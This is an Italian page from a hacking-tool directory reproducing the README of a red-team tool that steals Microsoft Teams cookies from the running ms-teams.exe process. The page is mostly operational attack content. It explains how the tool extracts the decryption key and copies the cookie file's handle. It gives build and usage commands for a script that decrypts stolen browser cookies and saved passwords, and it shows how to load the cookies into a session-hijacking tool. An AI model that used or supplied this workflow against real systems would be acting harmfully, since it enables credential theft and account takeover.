Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
teams-cookies-bof — BOF per rubare i cookie di Teams | Kitploit
Strumenti/GitHubGitHub/tierzerosecurity/teams-cookies-bof
Post-ExploitRed Teaming
GitHubtierzerosecurity/teams-cookies-bof

teams-cookies-bof

BOF per rubare i cookie di Teams

Vedi Repository
13210110 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

teams-cookies-bof

Rubare i cookie per Teams, mentre si è in esecuzione all'interno del processo ms-teams.exe. Articolo correlato: https://tierzerosecurity.co.nz/2025/11/03/teams-cookies-bof.html

Basato su: https://blog.randorisec.fr/ms-teams-access-tokens/.

Questo strumento è fortemente basato su Cookie-Monster-BOF.

Il BOF estrarrà la chiave di crittografia, individuerà i processi msedgewebview2.exe con un handle al file dei cookie, copierà l'handle e poi scaricherà il file di destinazione senza scrivere su disco.

Una volta scaricati i cookie, lo script Python di decifratura (vedi sotto) può essere utilizzato per estrarre questi segreti.

Utilizzo del BOF

Il BOF deve essere eseguito all'interno del processo Teams ms-teams.exe. Il BOF non accetta argomenti.

teams-bof

Compilare il BOF

Assicurarsi che Mingw-w64 e make siano installati su Linux prima di compilare.

root@kitploit:~
make
Scarica lo strumento

Passaggi di decifratura

Installa i requisiti

root@kitploit:~
pip3 install -r requirements.txt

Utilizzo

root@kitploit:~
python3 decrypt.py -h                                                                                                                                                                      
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]

Decrypt Chromium cookies and passwords given a key and DB file

options:
  -h, --help            show this help message and exit
  -k KEY, --key KEY     Decryption key
  -o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
                        Option to choose
  -f FILE, --file FILE  Location of the database file
  --chrome-aes-key CHROME_AES_KEY
                        Chrome AES Key

Esempi: Decifrare il file dei cookie di Chrome/Edge

root@kitploit:~
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db

Esempio di risultati:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decifrare i cookie di Chrome con la chiave AES di Chrome

root@kitploit:~
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json

Decifrare il file dei cookie di Chrome/Edge e salvarlo in json

root@kitploit:~
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Esempio di risultati:
Cookies saved to 2025-04-11_18-06-10_cookies.json

Importare il file JSON dei cookie con https://cookie-editor.com/

Decifrare il file delle password di Chrome/Edge

root@kitploit:~
python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db

Esempio di risultati:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decifrare i cookie di Firefox e le credenziali memorizzate:
https://github.com/lclevy/firepwd

Supporto per CuddlePhish

aggiunta l'opzione cuddlephish allo script di decifratura che dovrebbe supportare l'utilizzo del cookie con https://github.com/fkasler/cuddlephish

root@kitploit:~
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db

# Clone Project
cd 
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish

# Install Dependencies Example on Debian 
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install

# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json

Riferimenti

Rubare i token di accesso di Microsoft Teams nel 2025: https://blog.randorisec.fr/ms-teams-access-tokens/
Cookie-Monster-BOF: https://github.com/KingOfTheNOPs/cookie-monster
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Download senza scrittura su disco: https://github.com/fortra/nanodump